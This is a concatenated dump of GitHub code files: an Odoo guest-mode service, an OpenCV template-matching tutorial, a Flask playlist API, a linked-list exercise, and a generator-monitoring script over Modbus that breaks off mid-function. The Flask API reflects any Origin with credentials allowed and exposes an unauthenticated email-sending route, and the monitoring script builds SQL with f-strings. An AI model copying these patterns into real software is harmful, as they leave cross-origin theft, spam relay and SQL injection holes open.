self.shopinvader_backend.is_guest_mode_allowed:\n raise Forbidden(\"Guest mode not allowed.\")\n params[\"is_guest\"] = True\n self._archive_existing_binding(params[\"email\"])\n resp = super().create(**params)\n resp[\"store_cache\"][\"customer\"][\"is_guest\"] = True\n return resp\n\n def search(self, email):\n \"\"\"\n Search for guest with email\n :param email:\n \"\"\"\n res = self._get_binding(email)\n return {\"found\": len(res) > 0}\n\n def register(self, email, external_id):\n \"\"\"\n Called to transform a guest account into a registered curtomer account\n :param email:\n :param external_id:\n \"\"\"\n binding = self._get_binding(email)\n if not binding:\n raise NotFound(email)\n binding.write({\"is_guest\": False, \"external_id\": external_id})\n self.work.partner = binding.record_id\n return self._prepare_create_response(binding)\n\n def stop(self, email):\n \"\"\"\n Called to invalidate the guest mode into the current session\n \"\"\"\n binding = self._get_binding(email)\n if not binding:\n raise NotFound(email)\n return {\"store_cache\": {\"customer\": {}}}\n\n # The following method are 'private' and should be never never NEVER call\n # from the controller.\n # All params are trusted as they have been checked before\n\n def _validator_create(self):\n schema = super()._validator_create()\n if \"external_id\" in schema:\n schema.pop(\"external_id\")\n return schema\n\n def _validator_search(self):\n return {\"email\": {\"type\": \"string\", \"required\": True}}\n\n def _validator_return_search(self):\n return {\"found\": {\"type\": \"boolean\", \"required\": True}}\n\n def _validator_register(self):\n return {\n \"email\": {\"type\": \"string\", \"required\": True},\n \"external_id\": {\"type\": \"string\", \"required\": True},\n }\n\n def _validator_stop(self):\n return {\"email\": {\"type\": \"string\", \"required\": True}}\n\n def _send_welcome_message(self, binding):\n if binding.is_guest:\n self.shopinvader_backend._send_notification(\n \"guest_customer_welcome\", binding.record_id\n )\n else:\n super()._send_welcome_message(binding)\n\n def _get_binding(self, email):\n domain = [\n (\"email\", \"=\", email),\n (\"is_guest\", \"=\", True),\n (\"backend_id\", \"=\", self.shopinvader_backend.id),\n ]\n return self.env[\"shopinvader.partner\"].search(domain, limit=1)\n\n def _archive_existing_binding(self, email):\n \"\"\"\n If a previous guest binding already exists: Archive...\n \"\"\"\n binding = self._get_binding(email)\n if binding:\n binding.active = False\n binding.flush()\n\n def _to_customer_info(self, partner):\n info = super()._to_customer_info(partner)\n info.update({\"email\": self.partner.email})\n return info\n","repo_name":"shopinvader/odoo-shopinvader","sub_path":"shopinvader_guest_mode/services/guest_service.py","file_name":"guest_service.py","file_ext":"py","file_size_in_byte":3407,"program_lang":"python","lang":"en","doc_type":"code","stars":105,"dataset":"github-code","pt":"81"} +{"seq_id":"41209623871","text":"# 템플릿 매칭으로 객체 위치 검출\r\n# 템플릿 매칭은 크기, 방향, 회전 등의 변화에는 약하고 속도가 느린 단점이 있다\r\n\r\n# 찾을 물체가 있는 영상을 준비해 두고 그 물체가 포함되어 있을 것이라 예상되는\r\n# 입력 영상과 비교해서 물체가 매칭되는 위치를 찾는다.\r\n# 미리 준비해둔 미리 찾을 물체 영상을 템플릿 영상이라고 함\r\n\r\n# 템플릿 영상은 입력 영상보다 항상 크기가 작아야 한다.\r\n\r\n\r\nimport cv2\r\nimport numpy as np\r\n\r\n# 입력 영상\r\nimg = cv2.imread(\"./img/figures.jpg\")\r\n# 템플릿 영상\r\ntemplate = cv2.imread(\"./img/taekwonv1.jpg\")\r\nth, tw = template.shape[:2]\r\ncv2.imshow(\"template\", template)\r\n\r\n# 세 가지 매칭 메서드 순회\r\n\r\n# 매칭 메서드 종류 9개 중 현재 사용중인 매칭 3가지\r\n# cv2.TM_CCOEFF_NORMED : 상관계수 매칭의 정규화, 완벽 매칭 = 1, 나쁜 매칭 = -1\r\n# cv2.TM_CCORR_NORMED : 상관관계 매칭의 정규화, 완벽 매칭 = 큰 값, 나쁜 매칭 = 0\r\n# cv2.TM_SQDIFF_NORMED : 제곱 차이 매칭의 정규화, 완벽 매칭 = 0, 나쁜 매칭 = 큰 값\r\nmethods = [\"cv2.TM_CCOEFF_NORMED\", \"cv2.TM_CCORR_NORMED\", \"cv2.TM_SQDIFF_NORMED\"]\r\n\r\n\r\nfor i, method_name in enumerate(methods):\r\n img_draw = img.copy()\r\n method = eval(method_name)\r\n # 템플릿 매칭\r\n # cv2.matchTemplate(입력영상, 템플릿 영상, 매칭 메서드)\r\n res = cv2.matchTemplate(img, template, method)\r\n # 최대, 최소 값과 그 좌표 구하기\r\n min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(res)\r\n print(method_name, min_val, max_val, min_loc, max_loc)\r\n \r\n # cv2.TM_SQDIFF 의 경우 최소 값이 좋은 매칭, 나머지는 반대\r\n if method in [cv2.TM_SQDIFF, cv2.TM_SQDIFF_NORMED]:\r\n top_left = min_loc\r\n match_val = min_val\r\n \r\n else:\r\n top_left = max_loc\r\n match_val = max_val\r\n \r\n # 매칭 좌표를 구해서 빨간색 사각형으로 표시\r\n bottom_right = (top_left[0] + tw, top_left[1] + th)\r\n cv2.rectangle(img_draw, top_left, bottom_right, (0,0,255), 2)\r\n # 매칭 값 표시\r\n cv2.putText(img_draw, str(match_val), top_left, cv2.FONT_HERSHEY_PLAIN,\\\r\n 2, (0,255,0), 1, cv2.LINE_AA)\r\n cv2.imshow(method_name, img_draw)\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()","repo_name":"jso303/OpenCV_Python","sub_path":"Chapter08/template_matching.py","file_name":"template_matching.py","file_ext":"py","file_size_in_byte":2379,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"13010496449","text":"# -*- coding: utf-8 -*-\nfrom listentoitlater import app\nfrom listentoitlater.db.db import *\nfrom listentoitlater.controllers.index import json_response\nfrom listentoitlater.controllers.mail import send_email\nfrom flask import request, jsonify, make_response, Response\nfrom flask_login import current_user, login_required\n\n#----------- RESTful API\n# for versioning in the future use request.headers['Accept'] and\n# check if it gets \"application/crately.1.0+json\"\n#\n# for error handling on clients which don't accept other than 200\n# use supress_response_code=true in the url\n# and use method=get for the other options\n\n# Status codes:\n# 200 - OK\n# 404 - Not Found\n\n\n@app.errorhandler(400)\ndef bad_request(error):\n if \"application/json\" in request.accept_mimetypes:\n return jsonify(message='Bad Request' + error.description, status=error.code) # error.description or 'Bad Request'\n\n html = (\n '\\n'\n '400 Bad Request\\n'\n '

Bad Request

\\n'\n '

The browser (or proxy) sent a request that this server could'\n 'not understand.

'\n )\n return make_response(html, 400)\n\n\n@app.errorhandler(404)\ndef page_not_found(error):\n if \"application/json\" in request.accept_mimetypes:\n return Response({'message': 'This page does not exist', 'status': error.code}, 404, mimetype='application/json')\n\n html = (\n '\\n'\n '404 Not Found\\n'\n '

Not Found

\\n'\n '

The requested URL was not found on the server.

'\n '

If you entered the URL manually please check your spelling and try again.

'\n )\n return make_response(html, 404)\n\n\n@app.route('/api/user/me', methods=[\"GET\"])\n@login_required\ndef me():\n return json_response(str(current_user))\n\n\n@app.after_request\ndef after_request(response):\n if request.method in ['OPTIONS', 'POST']:\n origin = request.headers.get('Origin', '')\n response.headers.add('Access-Control-Allow-Origin', origin)\n response.headers.add('Access-Control-Max-Age', 1000)\n response.headers.add('Access-Control-Allow-Credentials', 'true')\n response.headers.add('Access-Control-Allow-Methods', 'HEAD, GET, PUT, POST, OPTIONS, DELETE')\n response.headers.add('Access-Control-Allow-Headers', 'Origin, X-Requested-With, Content-Type, Accept')\n return response\n\n\n#----------- User's playlist\n# GET, POST(replace), PUT(create) and DELETE a specific or all playlists\n@app.route('/api/user//playlists', methods=['GET', 'PUT', 'DELETE'])\n@app.route('/api/user//playlists/', methods=['GET', 'POST', 'PUT', 'DELETE'])\n@login_required\ndef playlists(username, id=None, default=False):\n \"\"\"\n Returns the playlists of the current user by allowing to GET, PUT(create) or DELETE methods.\n\n >>> ctx = app.test_request_context('/api/user/me/playlists')\n >>> ctx.push()\n >>> print playlists()\n \n \"\"\"\n if username == 'me':\n if request.method == \"GET\":\n if id is not None:\n # GET/return a specific user's playlist (id)\n for playlist in current_user._user.playlists:\n if playlist.title == id:\n return json_response(json.dumps(playlist, default=encode_model))\n return jsonify(result='playlist not found', status=404)\n else:\n # GET/return a all user's playlists (limit?)\n # TODO user pagination => ie. ?page=2&per_page=20\n return json_response(json.dumps(current_user._user.playlists, default=encode_model))\n pass\n\n elif request.method == \"PUT\" and request.mimetype == 'application/json':\n if id is not None:\n # PUT/update a specific user's playlist and return the number of recordings\n data = request.json\n return jsonify(data=data)\n else:\n # PUT/update all user's playlist and return the number of playlists\n\n prevlen = len(current_user._user.playlists)\n current_user._user.playlists = []\n\n sc = Platform(name='SoundCloud', url=\"http://soundcloud.com\")\n #yt = Platform(name='Youtube', url=\"http://youtube.com\")\n\n playlists = request.json\n for playlist in playlists:\n playlist_recordings = []\n for recording in playlist['recordings']:\n #platform = Platform()\n #if recording['platform']['name'].lower() == 'soundcloud':\n platform = sc\n #elif recording['platform']['name'].lower() == 'youtube':\n # platform = yt\n # TAGS are missing\n found_or_new_rec = Recording.objects.get_or_create(title=recording['title'], duration=recording['duration'], recording_id=recording['recording_id'], platform_user_id=recording['platform_user_id'], url=recording['url'], platform=platform, artwork_url=recording['artwork_url'])[0]\n playlist_recordings.append(found_or_new_rec)\n # TAGS are missing\n current_user._user.playlists.append(Playlist(title=playlist['title'], default=playlist['default'], recordings=playlist_recordings))\n current_user._user.save()\n return jsonify(prevlen=prevlen, data=len(current_user._user.playlists))\n\n elif request.method == \"POST\" and request.mimetype == 'application/json':\n if id is None or id != 'Favorites':\n return jsonify(result='can only add audio tracks to Favorites FTM, not ' + id)\n\n # POST/add a specific user's playlist (Favorites)\n else:\n users_playlists = current_user._user.playlists\n\n if request.json is None:\n return jsonify(result='request empty')\n\n recording = request.json\n result = 'playlist not found'\n for playlist in users_playlists:\n if playlist.title == id:\n sc = Platform(name='SoundCloud', url=\"http://soundcloud.com\")\n platform = sc\n found_or_new_rec = Recording.objects.get_or_create(title=recording['title'], duration=recording['duration'], recording_id=recording['recording_id'], platform_user_id=recording['platform_user_id'], url=recording['url'], platform=platform, artwork_url=recording['artwork_url'])[0]\n playlist['recordings'].append(found_or_new_rec)\n\n result = recording\n break\n\n current_user._user.save()\n\n # Add username and date_registered to log who's adding a track from the Bookmarklet (Mixpanel)\n result['username'] = str(current_user._user.username)\n result['date_registered'] = str(current_user._user.date_registered.isoformat())\n # print result['date_registered']\n return jsonify(result=result)\n\n elif request.method == \"DELETE\":\n if id is not None:\n # DELETE a specific user's playlist\n pass\n else:\n # DELETE all the playlists\n pass\n else:\n return jsonify(result='unsupported method called')\n else:\n return jsonify(result='only user supported in api is \"me\" called')\n\n\n#----------- Recordings\n@app.route('/api/recordings/', methods=['GET', 'POST'])\n@login_required\ndef recordings(id=None):\n if id is not None:\n # if (id) is a URL\n if id.startswith(\"http://\") or id.startswith(\"https://\"):\n # url = id\n # Get information about a song by the song URL. The URL can be a direct link to a Soundcloud or Youtube song. If the URL is not already in Crate.ly a new song recording will be created.\n if request.method == \"GET\":\n # Recording.objects.get_or_create()\n pass\n else:\n return jsonify(result='unsupported method called')\n\n # else if (id)\n else:\n if request.method == \"GET\":\n # GET and return a specific recording\n pass\n elif request.method == \"POST\":\n # POST/update a specific recording\n pass\n else:\n return jsonify(result='unsupported method called')\n else:\n return jsonify(result='id or url not provided')\n\n\n@app.route('/hello//')\ndef hello(subject, to_address):\n tags = [\"test\"]\n if send_email(subject, to_address, tags)[0]['status'] == \"sent\":\n return \"email sent successfully\"\n","repo_name":"gianpaj/crately","sub_path":"listentoitlater/controllers/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":8941,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"39719248374","text":"\"\"\"\nGiven a singly linked list A, determine if its a palindrome. Return 1 or 0 denoting if its a palindrome or not, respectively.\n\"\"\"\nclass ListNode:\n def __init__(self, val):\n self.val = val\n self.next = None\n \nclass Solution:\n def findmid(self, head):\n s, f = head, head\n while f.next != None:\n s = s.next\n f = f.next\n if f.next != None:\n f = f.next\n return s\n\n def reversell(self, head):\n prev = None\n curr = head\n next = curr.next\n while curr:\n curr.next = prev\n prev = curr\n curr = next\n if curr:\n next = curr.next\n return prev\n\n def lPalin(self, A):\n if A.next is None:\n return 0\n\n #check mid\n s = self.findmid(A)\n\n temp = A\n while temp.next != s:\n temp = temp.next\n temp.next = None\n\n two = self.reversell(s)\n one = A\n\n while one:\n if one.val != two.val:\n return 0\n one = one.next\n two = two.next\n return 1\n\n\na = ListNode(1)\nb = ListNode(1)\nc = ListNode(2)\nd = ListNode(1)\ne = ListNode(3)\nf = ListNode(2)\ng = ListNode(1)\n#a.next = b\n#b.next = c\nc.next = d\n#d.next = e\ne.next = f\nf.next = g\n\nt = Solution()\nprint(t.lPalin(a))","repo_name":"anurag5398/DSA-Problems","sub_path":"LinkedList/PalindromeList.py","file_name":"PalindromeList.py","file_ext":"py","file_size_in_byte":1363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"30340108593","text":"import logging\nimport logging.handlers as handlers\nimport random\nimport time\nimport os\nimport sqlite3\nimport serial\nimport socket\nimport requests\nimport json\nimport ast\nimport datetime\nfrom concurrent import futures\nfrom persistqueue import FIFOSQLiteQueue as q_persistente # Para crear pila persistente en disco\nfrom pymodbus.client.sync import ModbusSerialClient as MBus_rtu # Crea clientes modbus\nfrom pymodbus.client.sync import ModbusTcpClient as MBus_TCP\nfrom rd_wr_DB import read_from_db, update_to_db, create_to_db, drop_db\n\n# if os.getcwd() != 'siempre':\n# os.chdir('./siempre')\nwork_dir=os.getcwd()\n# print(work_dir)\n\n# Globales:\nDB = 'db.sqlite3'\ntest_internet = False\ntest_aveva = False\n\nlogger = logging.getLogger('siempre.Log')\nlogger.setLevel(logging.INFO)\nlogHandler= handlers.RotatingFileHandler('siempre.log',maxBytes=5*1024*1024, backupCount=5)\nlogHandler.setLevel(logging.INFO)\nlogger.addHandler(logHandler)\nformatter = logging.Formatter('%(asctime)s - %(levelname)s - %(message)s')\nlogHandler.setFormatter(formatter)\nlogger.addHandler(logHandler) \nlogger.info('-------------Inicialización Siempre-------------')\nlogger.info(f'Directorio de trabajo: {work_dir}')\n\n#---------------------------------------------------------------------------------------\n\ndef load_initial_configuration():\n \"\"\"Carga la configuración inicial del software\"\"\"\n INITIAL_QUERY = 'SELECT * FROM equipos_equipo'\n initial_configuration = read_from_db(DB,INITIAL_QUERY) \n return initial_configuration\n\ndef set_DB (initial_configuration):\n query_vaciar_interno = f\"DELETE FROM equipos_interno WHERE var_name > 0\"\n update_to_db(DB,query_vaciar_interno)\n \n for each in initial_configuration:\n internal_name = each['internal_name']\n control = each['control']\n engine_model = each['engine_model']\n voltaje = each['voltaje']\n \n ################### DB process #################### \n db_query_drop = f'DROP TABLE IF EXISTS {internal_name}'\n drop_db(DB, db_query_drop)\n \n db_query_create= f'CREATE TABLE \"{internal_name}\" (\"internal_name\" varchar(50), \"var_name\" varchar(30), \"valor_output\" varchar(30), \"minimo\" real, \"maximo\" real)'\n create_to_db(DB, db_query_create)\n \n db_query_insert = f'INSERT INTO {internal_name} (var_name, minimo, maximo) SELECT var_name, minimo, maximo FROM equipos_out_var WHERE engine_model = \"{engine_model}\" AND control = \"{control}\" AND voltaje = \"{voltaje}\"'\n update_to_db(DB,db_query_insert)\n \n db_query_insert2 = f\"INSERT INTO {internal_name} (var_name) VALUES ('comm_socket'), ('comm_test_socket'), ('comm_device_test')\"\n create_to_db(DB,db_query_insert2)\n \n db_query_update= f\"UPDATE {internal_name} SET internal_name = '{internal_name}'\"\n update_to_db(DB, db_query_update)\n \n db_query_insert3= f\"INSERT INTO equipos_interno (internal_name, var_name, valor_output, minimo, maximo) SELECT * FROM {each['internal_name']}\"\n update_to_db(DB, db_query_insert3)\n \n db_query = f\"DROP TABLE IF EXISTS {internal_name}\"\n drop_db(DB, db_query)\n \ndef update_global_status_values(internet, aveva): \n \n update_db_query=f\"\"\"UPDATE equipos_status_var SET internet_connection = {internet}, aveva_connection = {aveva}\"\"\"\n update_to_db(DB,update_db_query)\n \ndef internet_test():\n IP = '8.8.8.8'\n URL = 'https://online.wonderware.com' #'https://online.wonderware.com/apis/upload/datasource'\n \n while True: \n test_internet = chk_internet_socket()\n test_aveva = chk_internet_socket(host=URL, url_or_ip= 'url')\n update_global_status_values(test_internet,test_aveva)\n if test_internet == False or test_aveva == False:\n logger.error (f'Conexión a Internet = {test_internet} -- Conexión a Aveva = {test_aveva}')\n else:\n logger.info (f'Conexión a Internet = {test_internet} -- Conexión a Aveva = {test_aveva}')\n time.sleep(60)\n\ndef chk_internet_socket(host= '8.8.8.8' ,url_or_ip = 'ip' , timeout=10):\n \"\"\" Verifica si existe conexion con el host.\n ...\n \n Args\n ----\n host (str, optional):\n Puede ser una IP ejem.: 1.1.1.1 o una url. Default: '8.8.8.8'.\n url_or_ip (str, optional):\n Definir: \"url\" o \"ip\". Default: 'ip'.\n timeout (int, optional):\n Default: 10.\n\n Returns\n -------\n Boolean:\n Retorna si hay conexion al host.\n \"\"\"\n try:\n if url_or_ip == 'ip':\n port=53\n socket.setdefaulttimeout(timeout)\n socket.socket(socket.AF_INET, socket.SOCK_STREAM).connect((host, port))\n return True\n else: \n request = requests.get(host, timeout=timeout) \n return True\n except socket.error as ex:\n return False\n except (requests. ConnectionError, requests. Timeout) as exception:\n return False\n\ndef crear_conector(device):\n \"\"\"Aqui se crea la conexion con cada puerto\"\"\"\n communication_mode = device['communication_mode']\n internal_name = device['internal_name']\n comm_socket=False\n test_socket=False \n try:\n if communication_mode == 'rtu': \n modbus = MBus_rtu(method='rtu',port=device['port'],baudrate=int(device['baudrate']),databits=device['databits'],parity=device['parity'],stopbits=device['stopbits'])\n if modbus:\n comm_socket=True\n logger.info(f\"Se creo conector RTU con dispositivo: {internal_name} en purto: {device['port']}\") \n socket = verificacion_nodo(modbus, internal_name)\n if socket: \n test_socket = True\n\n if communication_mode == 'TCP':\n modbus = MBus_TCP(method='tcp', host=device['IP'], port=device['port'])\n if modbus:\n comm_socket=True\n logger.info(f\"Se creo conector TCP con dispositivo: {internal_name} en la IP: {device['IP']}\") \n socket = verificacion_nodo(modbus, internal_name)\n if socket: test_socket = True\n \n if communication_mode == 'RS232':\n port = device['port']\n baudrate = int(device['baudrate'])\n databits = device['databits']\n parity = device['parity']\n stopbits = int(device['stopbits']) \n conector_RS232 = serial.Serial(port=port, baudrate=baudrate, bytesize=databits, parity=parity, stopbits=stopbits)\n if conector_RS232.is_open == True:\n logger.info(f'Se creo conector serie con puerto: {port}')\n socket=conector_RS232\n comm_socket=True\n test_socket=True\n else:\n socket=None\n test_socket = False\n \n # Falta implementar DIESEL \n except Exception as e: \n logger.error('Modulo: \"crear_conector\" - ',e)\n comm_socket=False\n test_socket=False\n \n \n finally:\n query_socket = f\"UPDATE 'equipos_interno' SET valor_output = {comm_socket} WHERE var_name = 'comm_socket' AND internal_name = '{internal_name}'\"\n query_test_socket = f\"UPDATE 'equipos_interno' SET valor_output = {test_socket} WHERE var_name = 'comm_test_socket' AND internal_name = '{internal_name}'\"\n update_to_db(DB,query_socket)\n update_to_db(DB,query_test_socket)\n return socket\n \ndef verificacion_nodo(socket, internal_name):\n \"\"\"Aqui se verifica la comunicación con cada nodo. Una conexion por puerto.\"\"\"\n intentos=0\n try:\n while intentos < 11: #Verifica puerto Abierto\n if intentos < 10:\n socket.connect()\n if socket.socket: # Intenta conexión con puerto modbus\n break\n else:\n logger.warning(f'Modbus en \"{internal_name}\" sin conexion. Intento de conexión: {intentos}')\n time.sleep(0.2)\n intentos += 1\n\n if not socket.socket:\n socket.close()\n logger.error(f'Sin conexion Modbus en \"{internal_name}\" - Fuera de servicio')\n else:\n logger.info(f'Conexion Modbus con \"{internal_name}\" - OK')\n \n except Exception as e_test: \n logger.error(f\"{e_test}\")\n socket=None\n finally:\n return socket\n \ndef control_communication_test(self, sck):\n \"\"\"Verifica la comunicación con cada control y guarda el estado en la base de datos.\"\"\"\n \n result_comm_test = False\n intentos=0\n while intentos < 15:\n try:\n test_lectura= sck.read_holding_registers(address=1600,count=1,unit=int(self.slave))\n if test_lectura.function_code == 3:\n logger.info(f\"Conexión con {self.internal_name} establecida -- OK. Valor: {test_lectura.registers[0]}\")\n result_comm_test = True\n break \n except Exception as e_test_control:\n result_comm_test = False\n logger.error(f\"Error de comunicación con control: {self.internal_name} --> {e_test_control}\")\n finally:\n intentos+=1\n if result_comm_test == False: logger.error(f\"Sin conexion con control de {self.internal_name} --> Fuera de servicio\")\n \n query_comm_test = f\"UPDATE 'equipos_interno' SET valor_output = {result_comm_test} WHERE var_name = 'comm_device_test' AND internal_name = '{self.internal_name}'\"\n update_to_db(DB,query_comm_test)\n \n return result_comm_test\n\nclass lectura_equipo():\n \n \"\"\"Esta clase crea un proceso por cada equipo\"\"\" \n def __init__(self, device): \n self.internal_name = device['internal_name']\n self.communication_mode = device['communication_mode']\n self.port = device['port']\n self.slave = device['slave']\n self.pila = q_persistente(path=f\"./buffer/{self.internal_name}\",multithreading=True)\n self.engine_model = device['engine_model']\n self.control = device['control']\n self.token = device['token']\n self.voltaje = device['voltaje']\n \n # carga variables de entrada: \n vars_input_query = f\"SELECT var_name, address, bit, multiplicador, signo, tratamiento FROM equipos_in_var WHERE engine_model = '{self.engine_model}' AND control = '{self.control}'\"\n self.in_vars = read_from_db(DB, vars_input_query)\n \n # carga variables de salida: \n vars_output_query = f\"SELECT * FROM equipos_interno WHERE internal_name = '{self.internal_name}'\"\n self.out_vars = read_from_db(DB, vars_output_query)\n \n #configura el modo de lectura modbus (esto disminuye el tiempo de lectura desde el control):\n self.mode = self.load_mode()\n \n #parametros iniciales:\n self.read_list=[]\n status_send = True\n \n ###########################################################################\n #Loop infinito de conexion y reconexion:\n while True:\n ###########################################################################\n #Loop infinito de envio de datos:\n read_times = 0\n read_alarmas = False\n try:\n socket = crear_conector(device)\n # test_device_comm()\n comm_test = control_communication_test(self, socket)\n if comm_test == False:\n continue\n else:\n while socket.socket:\n \n if read_times >= 10:\n status_send = self.send_read_list(read_list = self.read_list)\n if status_send == False:\n self.save_in_buffer(read_list=self.read_list)\n read_times = 0\n self.read_list=[]\n else:\n if read_times >= 9: read_alarmas = True\n lectura = self.read_device(socket = socket, read_alarmas= read_alarmas)\n self.send_to_db(lectura)\n self.read_list.append(lectura) \n read_times +=1\n except Exception as ex:\n logger.error(f\"Falla en modulo principal de lectura. Interno {self.internal_name}.\",ex) \n\n logger.error (f\"Falla de conexión de socket en {self.internal_name}\")\n time.sleep(10) # Espera para intentar reconexion\n \n def read_device(self, socket, read_alarmas = False):\n read_device_dict = {}\n \n aux_apendice=[]\n aux_list_keys=[]\n aux_vars_leidas={}\n\n try:\n for key, rango in self.mode.items():\n read_registers=socket.read_holding_registers(key-1,rango,unit=int(self.slave))\n \n aux_apendice.extend(read_registers.registers)\n for i in range(key,(key+rango)):\n aux_list_keys.append(i)\n \n # Acondiciona los datos leidos:\n aux_dict_leido= dict(zip(aux_list_keys,aux_apendice))\n\n for valor in self.in_vars:\n var = valor['var_name']\n address = valor['address'] \n if address in aux_dict_leido:\n aux_vars_leidas[var]=aux_dict_leido.get(address)\n read_device_dict = self.calculos(aux_vars_leidas)\n \n # Limita maximos y minimos: \n read_device_dict = self.limitar_max_min(read_device_dict)\n \n # Insertar variables de estado por equipo:\n query_status = f\"SELECT var_name, valor_output FROM 'equipos_interno' WHERE internal_name = '{self.internal_name}' AND var_name LIKE 'comm_%' \"\n status_vars = read_from_db(DB,query_status)\n for each in status_vars:\n read_device_dict[each.get('var_name')] = each.get('valor_output')\n \n # Insertar variables de estado globales:\n query_global_status = f\"SELECT internet_connection, aveva_connection FROM equipos_status_var\"\n global_status_vars = read_from_db(DB,query_global_status)\n read_device_dict[\"internet_connection\"] = global_status_vars[0].get('internet_connection')\n read_device_dict[\"aveva_connection\"] = global_status_vars[0].get('aveva_connection')\n \n # Se agrega TimeStamp:\n hora = datetime.datetime.utcnow().strftime('%Y-%m-%dT%H:%M:%S.%f')[:-3] + 'Z'\n read_device_dict[\"DateTime\"]= str(hora)\n read_device_dict['Hora_lectura']= str(hora)\n \n # Lectura de alarmas:\n if read_alarmas == True:\n leer_alarmas(aux_dict_leido,self.internal_name,self.control)\n \n except Exception as ex:\n logger.error(f\"Modulo Read device {self.internal_name}:\\n{ex}\")\n return None\n \n return read_device_dict\n \n def send_read_list(self, read_list):\n HEADER = {\n 'Content-Type': 'application/json',\n 'x-filename': self.internal_name + '.json',\n 'Authorization': self.token}\n\n URL = 'https://online.wonderware.com/apis/upload/datasource' \n \n try:\n str_read_list = json.dumps(read_list, indent = 4)\n payload = '{\"data\": ' + str_read_list + '}'\n #Request de envio a Aveva; \n request_response = requests.request(\"POST\", url=URL, headers=HEADER, data=payload, timeout=3)\n if request_response: response = True \n except Exception as ex:\n response = False\n test_internet=chk_internet_socket()\n test_aveva = chk_internet_socket(host= URL, url_or_ip='url')\n update_global_status_values(internet = test_internet, aveva=test_aveva)\n logger.error(f\"Modulo: send_read_list() -- Error de servidor o token. {self.internal_name}:\\n{ex}\")\n return response\n \n def save_in_buffer(self, read_list): \n try:\n pila = q_persistente(path=f\"./buffer/{self.internal_name}\",multithreading=True)\n pila.put(read_list) # Envia el str a una pila archivada\n pila.task_done()\n logger.warning(f'{self.internal_name} - Error de timeout o conexión con servidor. Se guardan los datos en Buffer.') \n except Exception as e:\n logger.error('Modulo: guardar_datos():\\n{e}') \n pass \n \n def calculos(self,var_leidas):\n salida={}\n for variable_entrada in self.in_vars:\n var_name = variable_entrada['var_name']\n \n if variable_entrada['signo'] == 'Signed': # Unisigned a Signed 16bit\n if var_leidas.get(var_name) > 32767:\n var_leidas[var_name] = var_leidas.get(var_name) - (2 ** 16)\n \n if variable_entrada['tratamiento'] == 'String': \n if var_leidas.get('Estado_Genset') == 0: salida['Estado_Genset'] = 'Stopped'\n elif var_leidas.get('Estado_Genset') == 1: salida['Estado_Genset'] = 'Start Pending'\n elif var_leidas.get('Estado_Genset') == 2: salida['Estado_Genset'] = 'Warm Up at IDLE'\n elif var_leidas.get('Estado_Genset') == 3: salida['Estado_Genset'] = 'Running'\n elif var_leidas.get('Estado_Genset') == 4: salida['Estado_Genset'] = 'Cooldown at Rated'\n elif var_leidas.get('Estado_Genset') == 5: \n salida['Estado_Genset'] = 'Cooldown as IDLE'\n else: \n salida['Estado_Genset'] = 'Unknow' \n if var_leidas.get('Modo_Control') == 0: salida['Modo_Control'] = 'OFF'\n elif var_leidas.get('Modo_Control') == 1: salida['Modo_Control'] = 'Run/Manual'\n elif var_leidas.get('Modo_Control') == 2: salida['Modo_Control'] = 'Automatico'\n else: salida['Modo_Control'] = 'Unknow'\n \n if variable_entrada['tratamiento'] == 'Bit':\n mascara= 2**(int(variable_entrada.get('bit')))\n if (var_leidas.get(var_name) & mascara) > 0: # Realiza AND con mascara y verifica bit leido.\n salida[var_name] = 1\n else:\n salida[var_name] = 0\n \n if variable_entrada['tratamiento'] == 'Directo': \n salida[var_name] = var_leidas.get(var_name)\n\n if variable_entrada['tratamiento'] == 'Temperatura1': \n salida[var_name] = round(((float(var_leidas.get(var_name)*0.1) - 32) * 0.5555555),2) # (32 °F − 32) × 5/9 = 0 °C\n \n if variable_entrada['tratamiento'] == 'Temperatura2': \n salida[var_name] = round(((float(var_leidas.get(var_name)) - 32) * 0.5555555),2) # (32 °F − 32) × 5/9 = 0 °C\n\n if variable_entrada['tratamiento'] == 'Knock': \n k_level = round(((var_leidas.get(var_name) * variable_entrada.get('multiplicador'))- 12.5) ,2)\n if k_level < 0: salida[var_name] = 0\n elif k_level > 100: salida[var_name] = 100\n else: salida[var_name] = k_level\n \n if variable_entrada['tratamiento'] == 'Escalado': \n salida[var_name] = round((var_leidas.get(var_name) * variable_entrada.get('multiplicador')),2)\n \n if variable_entrada['tratamiento'] == 'Complementario':\n salida['MWh'] = round ((float((var_leidas.get('MWh_a') * 65536) + var_leidas.get('MWh_b'))*0.001),4)\n salida['Horas_Motor'] = round (float((((var_leidas.get('Horas_a') * 65536) + var_leidas.get('Horas_b'))/3600)*0.1),2)\n\n if variable_entrada['tratamiento'] == 'Horas_GCP2':\n salida['Horas_Motor'] = round ((var_leidas.get('Horas_a') * 0.1) + (var_leidas.get('Horas_b')*1000),2)\n \n \n salida['V_Avg_N'] = round ((var_leidas.get('V_L1_N') + var_leidas.get('V_L2_N') + var_leidas.get('V_L3_N'))/3) # Agregado V_Avg_N solo en GCP2 \n \n \n return salida\n \n def limitar_max_min(self, dict_in):\n salida={}\n try:\n \n for out_var in self.out_vars:\n var_name = out_var['var_name']\n minimo = out_var['minimo']\n maximo = out_var['maximo']\n valor = dict_in.get(var_name)\n \n if minimo != 'NC' or maximo != 'NC':\n if type(valor) == int:\n if valor < minimo: valor = int(minimo)\n if valor > maximo: valor = int(maximo)\n if type(valor) == float:\n if valor < minimo: valor = float(minimo)\n if valor > maximo: valor = float(maximo)\n salida[var_name] = valor\n except Exception as e:\n logger.error('Modulo: \"limitar_min_max() - ', e) \n return salida \n \n def load_mode(self):\n mode_query = f\"SELECT mode FROM equipos_modbus_mode WHERE engine_model = '{self.engine_model}' AND control = '{self.control}'\"\n mode = ast.literal_eval(read_from_db(DB, mode_query)[0].get('mode'))\n ###############################################################################\n #### Para el futuro:\n #### Verificar que todas las input var esten dentro del MODE. #################\n ###############################################################################\n return mode\n \n def send_to_db (self, read_data):\n try:\n conn= sqlite3.connect(DB)\n cur = conn.cursor()\n \n for key, value in read_data.items():\n sql_update_query = f\"\"\"UPDATE 'equipos_interno' SET valor_output = ? WHERE internal_name = '{self.internal_name}' AND var_name = ?\"\"\"\n data = (value, key)\n 